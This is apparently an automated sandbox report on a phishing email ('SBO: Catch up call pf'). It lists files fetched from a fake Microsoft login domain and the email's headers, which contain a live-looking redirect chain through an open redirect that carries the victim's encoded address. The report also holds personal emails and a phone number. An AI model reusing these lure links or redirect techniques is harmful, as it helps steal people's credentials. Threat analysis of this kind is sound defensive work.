                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):2672
                                                                                                                                                                                                Entropy (8bit):6.640973516071413
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 3566
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):7.870472584687432
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:X+vHwUskGy5Fl9rq7m0XCyjQ2+fXw6p3fU6ifXusJGpj8Hs:X0HwUsqJm7m0yylR6FfKfXusEpjcs
                                                                                                                                                                                                MD5:D259E52D038EF6FF407E97E6D4F97228
                                                                                                                                                                                                SHA1:956D3B7BEEF77FA755B1A85EABEECE3CC5401E63
                                                                                                                                                                                                SHA-256:4ECC5BD3F78F987630D711210C0C13024B52D374704AB15B95BA0CE983B9342D
                                                                                                                                                                                                SHA-512:7C793DDF4FCB2F651B6E811A9B425BA7D57E216356F13E7FAADC1F15E9C2EA04D761D1D6F4559A1A5950CCB7B32F5345CA4A923AC196ED4414C401B9F237A5C8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://l1ve.gharelokhana.com/Me.htm?v=3
                                                                                                                                                                                                Preview:...........WMo.8...W.D...."...a...E]4mQu..W...e..).........,Y...C........|.C%230.3N.......c...<.....H.e...8U.....9..,t@9..-......Z?..%.^.^..+n.J..g...Re..H(ha.....s""O.$e.......PS..,I,.d .....*...v!/q..!..7.H.!. ;...n98..=...].+.i.....C$.v...g.Z...5..EY(...<t.}..!cY(..6^..M.Y..9G..&Q.n7\.;L.{.m.%.Xh.0..$.n..k1...x_$`eUm.............'.............b.#<.`.0`......(..&..v...re5.q...r.E...y..P..4$< !h.D.pQT6\..j..KX..T.X..>..<;....|....z-bcaL...].ZB.f..Mn.[m....._8A.s.=<.E..0.F.-..t..J..;..^...yh.."B......N.Wi..(.c..)...n.Ih'..8..&.L*$1...D4nx>...N...L.y.".Lsh.z..*r.).b..w.g..G....Z+...)....o......U.M7.e.zS...:$..}.RgH..9....7...\.n.i.kW.R|..>..?...t.s.zV..]..5..:WE...s..k+.D/..p:..>..&d....3.b;Ub%$>;3v...F}.W........Y.Z..H...o....G@.........t.:....Cf.u.}.j.MZ.K=.n....37tt..0.._../.M.J.y.:.x.T.^....5....?.sZ(..{..........q..6].i.....C .99L....;....y.....Fd..z..E@.H....|.T4).WX..v.L..w..,0e:M@K.BQ`.N3.:.2)&.e.......6]=...-(.O.....q..>^..2..@...T).....ovk...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):28
                                                                                                                                                                                                Entropy (8bit):4.307354922057605
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:8Kiun9ks:8Kiun2s
                                                                                                                                                                                                MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                                                                                                                                                                SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                                                                                                                                                                SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                                                                                                                                                                SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmwynrEGq4LLxIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                                                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 142331
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):49934
                                                                                                                                                                                                Entropy (8bit):7.995474321848419
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:768:wo1WK2TpRa/jXAAOY0tKABr4bO2TL2Ma6x357WDmI/pIZ4wg1gt/Tg6LpDlnsAAB:OTpRuAAOQI4bOqL2uX5vg1ga6FeXxDQa
                                                                                                                                                                                                MD5:55CB2F3B65B11F71B131817106F4B64A
                                                                                                                                                                                                SHA1:286A08FBCBF8A9C76E60D0A76CCBB45D3A422AEB
                                                                                                                                                                                                SHA-256:D0ED9B708A681925423907A15F8938DED57DCF1DB0C238D8855188F10BC8276C
                                                                                                                                                                                                SHA-512:4C587EDE61B097516E113109009584CEA040D1D5DC3119A407383E36329AF59294DA28A085C53178A0EEF6C3788976BDA8745219E4E6FB8889AE5BFD2AAF1953
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........m[.8.0........OL....;w.....a.L...\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De....q.W.~.@......*T.y.S7J.*..f...P....Pz.......a.E..<.m./A,*...Q.....U..q...$.Db,...H<...'....J,..$..;nG.2DHYkL../......=.pB....A?.&...i,......2lo...$.<.s...?~p[......L..&x.qR.u3...6q:....U.Y1.."... .>Un#7@.........."H,@.......?..P....p6.S.[...E].A..G.....q..j4w6......YwI2....[?....w..i......8...........So....d.K.1....|...........Cq...S5............r.......d...aUa>..JRM.-...nT.....qm....b.a...N..OEp..u.Z...2...#d.:.B.&O3Q.s..c.(.........Z....^F.....l..U...bZ..4:....?T.k.PeU\....L.a..>..t.......jV...B.i7....>b..T....D2...>.f.)...v0.y....kMKf..EG..X.....V`e../Sg...->.Vh}.....R..^..OZF.|i.(..#..1... P8!^3...$] .+..".........lM.'..!...(...T.l.;...$D%N .)..#O.V...'r\.... ...&....J|."Nd%D:uw6.>U.+...H&.Z...T=.&U.v....J.t.0%+...U..3M....y...L......p='.....?%...x:woO.{Q5..0....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2672
                                                                                                                                                                                                Entropy (8bit):6.640973516071413
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                Entropy (8bit):6.867828878374734
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 407099
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):116430
                                                                                                                                                                                                Entropy (8bit):7.997143110501834
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:3072:jLxCVzpL5w3IVaNf68lR3FZcNCQeX0WOyAKaKcyTukV:HgzJ5w3U8lMC/XfAjKcA
                                                                                                                                                                                                MD5:284E2D5D5FE511FD8070EE40210991CA
                                                                                                                                                                                                SHA1:41FAB12C7DAC7BC4D6B0084789576EBC78C4CDD2
                                                                                                                                                                                                SHA-256:B95C7A0D7AB7CBC1FBAD0734A3CBA61AD9D3FCDB5472F345C231CDA3E7DD6A56
                                                                                                                                                                                                SHA-512:ABFDDFD794FF9632F5C6ACAD38F6B24262A2A37A1A45B9646771B8D306C9C69A991E7C180805D12DF80B26EDEDC59D72D06E905034CC5A4AEA38DE38C3C13D70
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                                                                                                                                                                Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z....i.m..^k..l...z..0..7..h..'.7.....b..iz....o<?P...Kq\X.S..'...........o..Q...._...`k..7..W...[.l>..X.Y.O....;.".....`..X..r..C...0."...j.........>..-....R...6<...j.J...[.I...M..{..FSw.]..Q/i...3..y{.-..a...h.Eo..cc...O...)~..$...r-m..n......O.......f=..'q+..%L.'......fVW.bQ[.>&^t.O..I.LU....a....&.k.$...;..M...Y~...',.ox.&...f.2...o.L]..9....Ln-...i.+.X.|?..........d.#3.`.l.,'..E..b..Z@....@..|....2D1..,.....bZ....Co.N....^...6x..[....e..A+.......|...5...d...K.....W.|........6.....K.:..x9..s9P.-..!.G..0\
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                Entropy (8bit):6.867828878374734
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 407099
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):116430
                                                                                                                                                                                                Entropy (8bit):7.997143110501834
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:3072:jLxCVzpL5w3IVaNf68lR3FZcNCQeX0WOyAKaKcyTukV:HgzJ5w3U8lMC/XfAjKcA
                                                                                                                                                                                                MD5:284E2D5D5FE511FD8070EE40210991CA
                                                                                                                                                                                                SHA1:41FAB12C7DAC7BC4D6B0084789576EBC78C4CDD2
                                                                                                                                                                                                SHA-256:B95C7A0D7AB7CBC1FBAD0734A3CBA61AD9D3FCDB5472F345C231CDA3E7DD6A56
                                                                                                                                                                                                SHA-512:ABFDDFD794FF9632F5C6ACAD38F6B24262A2A37A1A45B9646771B8D306C9C69A991E7C180805D12DF80B26EDEDC59D72D06E905034CC5A4AEA38DE38C3C13D70
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z....i.m..^k..l...z..0..7..h..'.7.....b..iz....o<?P...Kq\X.S..'...........o..Q...._...`k..7..W...[.l>..X.Y.O....;.".....`..X..r..C...0."...j.........>..-....R...6<...j.J...[.I...M..{..FSw.]..Q/i...3..y{.-..a...h.Eo..cc...O...)~..$...r-m..n......O.......f=..'q+..%L.'......fVW.bQ[.>&^t.O..I.LU....a....&.k.$...;..M...Y~...',.ox.&...f.2...o.L]..9....Ln-...i.+.X.|?..........d.#3.`.l.,'..E..b..Z@....@..|....2D1..,.....bZ....Co.N....^...6x..[....e..A+.......|...5...d...K.....W.|........6.....K.:..x9..s9P.-..!.G..0\
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                Entropy (8bit):5.0572271090563765
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                                                                                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                                                                                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                                                                                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                                                                                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://alvoradavisual.com.br/favicon.ico
                                                                                                                                                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 57510
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):16345
                                                                                                                                                                                                Entropy (8bit):7.98961401355024
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:gOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:gOBKJBXO586QB+11J
                                                                                                                                                                                                MD5:1BB2645B377E0429225D33E4E2CC6E3F
                                                                                                                                                                                                SHA1:A40797795C77CDFF574080B506BAB17DB38494B5
                                                                                                                                                                                                SHA-256:B3B869875C7655F97500FBA0BCE74BCE7CC1DEE31D7CE5B93EA5D6457E07F08E
                                                                                                                                                                                                SHA-512:49C98F20572C7488FEDB8AAF6C3D1D004904536524B79FA44CAABC5B91C8BA1A192B10F1FBE28112CC324E17600160E5BAA5E30261E5D63858C16376219DD3FE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                                                                                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                                                File type:CDFV2 Microsoft Outlook Message
                                                                                                                                                                                                Entropy (8bit):4.87768470221458
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Outlook Message (71009/1) 58.92%
                                                                                                                                                                                                • Outlook Form Template (41509/1) 34.44%
                                                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                                                                                                                                                File name:SBO Catch up call pf.msg
                                                                                                                                                                                                File size:163'328 bytes
                                                                                                                                                                                                MD5:bd740fc68ab10ecc286c63e6fa4a9ce3
                                                                                                                                                                                                SHA1:dc5c39e880e5ee89ad784772f85105e52a8da46c
                                                                                                                                                                                                SHA256:430e8044df3b93d16dc5f9b2cd6b437e52b9bb5cd2356e4c07574a1af3d98d29
                                                                                                                                                                                                SHA512:608be6cd5c5e358178669388a308b961951a03a2c9b2040c6dc32139563328ad34343511c390cccc5e0407247968e91328fbeb6944d8577aa42e214ad2efb0e6
                                                                                                                                                                                                SSDEEP:3072:8Viv/sp7uXaR+jqpY0c0wP+bsush5R3WzWzWzWzWxVwTkTO:DvKaXaimbuh55WzWzWzWzWxVw
                                                                                                                                                                                                TLSH:8CF3772435FA021AF377DF368AE290979536BD93AD109A4F2191730D0672A41EC62F3F
                                                                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                                                                                Subject:SBO: Catch up call pf
                                                                                                                                                                                                From:Vocal recording <Sbo_Sbo_cy@culbertsplumbing.com>
                                                                                                                                                                                                To:klaus.mader@sbo.co.at
                                                                                                                                                                                                Cc:
                                                                                                                                                                                                BCC:
                                                                                                                                                                                                Date:Wed, 04 Dec 2024 16:17:31 +0100
                                                                                                                                                                                                Communications:
                                                                                                                                                                                                • <https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1> [cid:8D7A77E290921BDB25EA@VMF] C 497 https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2<https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2fpezxwn32zbr37fbrrrqh18g3y8eulbk2&c=E,1,dm0BsgXKEvQ4zpCWn9a_2TfhSLR8cGZr1-6jweGjTe0este5fASkeQZVLyX1Cz6QCtMNdDqQcYMIspu_vSObo4Nb1k5TezzFhTJcItmtEfuL-cJkW8Q4C3U6rUA,&typo=1&ancr_add=1> 13 https://fujipharma.box.com/s/4x9v4qxcj0rgtoah4if5h4f4p9cwtz7n<https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2f4x9v4qxcj0rgtoah4if5h4f4p9cwtz7n&c=E,1,kulNN5Sibc0-7EzMaFd8bnkzaUAt6vpyINXmhqwMz9noZtJ_sCaHNbokY4fr95tmU5g6SJ6OWx6-HiPnLOQ-3iqQKJ_nu6r4x2qGjF0vUXBrYZiUlnijf127h7o4&typo=1&ancr_add=1> -----Original Message----- From: megumi_tada@fujipharma.jp Sent: Thursday, November 14, 2024 1:31 PM To: EBC&M LLC Cc: EBC&M LLC ; EBC&M_ ; toshiaki_takayanagi@fujipharma.jp; hiroto_sugai@fujipharma.jp; chrispin_manda@fujipharma.jp; masashi_hirayama@fujipharma.jp; masayoshi_nogami@fujipharma.jp; narihiko_harada@fujipharma.jp; shin_maeda@fujipharma.jp Subject: BS_HIRS_2024-09-1 CRF CRF https://fujipharma.box.com/s/a7tvuywnn5igwj1mrqx03mquos4hiec6<https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2fa7tvuywnn5igwj1mrqx03mquos4hiec6&c=E,1,yHKKyVXq5sExSRIbA1glQ6NBG7wt7YKcsXo3unDnDdyCLTTT8tXWN4JSV8y4tGlF6pGsNpbCnHWt3_SfDh74eqE-vJwkyo6UvBWc-VboeWDb05rnf2Q,&typo=1&ancr_add=1> HIRS_2024-09-1_CRF_Q&A_20241113.xlsx **************************************** MA TEL: 080-9669-2547 E-mail: megumi_tada@fujipharma.jp
                                                                                                                                                                                                Attachments:
                                                                                                                                                                                                • kknn.png
                                                                                                                                                                                                • il7lil.pdf
                                                                                                                                                                                                • il7lil.pdf
                                                                                                                                                                                                • il7lil.pdf
                                                                                                                                                                                                Key Value
                                                                                                                                                                                                Receivedfrom a7-20.smtp-out.eu-west-1.amazonses.com (a7-20.smtp-out.eu-west-1.amazonses.com [54.240.7.20]) by mx-inbound43-217.eu-central-1c.ess.aws.cudaops.com (version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Thu, 05 Dec 2024 03:54:20 +0000
                                                                                                                                                                                                (260310a6:10:232::12) with Microsoft SMTP Server (version=TLS1_3,
                                                                                                                                                                                                HTTPS; Thu, 5 Dec 2024 0356:23 +0000
                                                                                                                                                                                                by VI1PR08MB10075.eurprd08.prod.outlook.com (260310a6:800:1bf::15) with
                                                                                                                                                                                                2024 0354:26 +0000
                                                                                                                                                                                                5 Dec 2024 0354:25 +0000
                                                                                                                                                                                                Authentication-Resultsspf=fail (sender IP is 35.157.190.234)
                                                                                                                                                                                                Received-SPFpass (mx-inbound43-217.eu-central-1c.ess.aws.cudaops.com: domain of 01020193923f7074-4582e554-13de-423d-9d7e-2ccf429ae7a7-000000@eu-west-1.amazonses.com designates 54.240.7.20 as permitted sender)
                                                                                                                                                                                                15.20.8230.7 via Frontend Transport; Thu, 5 Dec 2024 0354:25 +0000
                                                                                                                                                                                                DKIM-Signaturev=1; a=rsa-sha256; q=dns/txt; c=relaxed/simple;
                                                                                                                                                                                                h=FromSubject:To:Content-Type:MIME-Version:Date:Message-Id:Feedback-ID;
                                                                                                                                                                                                FromVocal recording <Sbo_Sbo_cy@culbertsplumbing.com>
                                                                                                                                                                                                SubjectSBO: Catch up call pf
                                                                                                                                                                                                Toklaus.mader@sbo.co.at
                                                                                                                                                                                                Content-Typemultipart/mixed; boundary="zqZLeY8PKjNLRwOvwmK5g4hD8x=_d7nDzB"
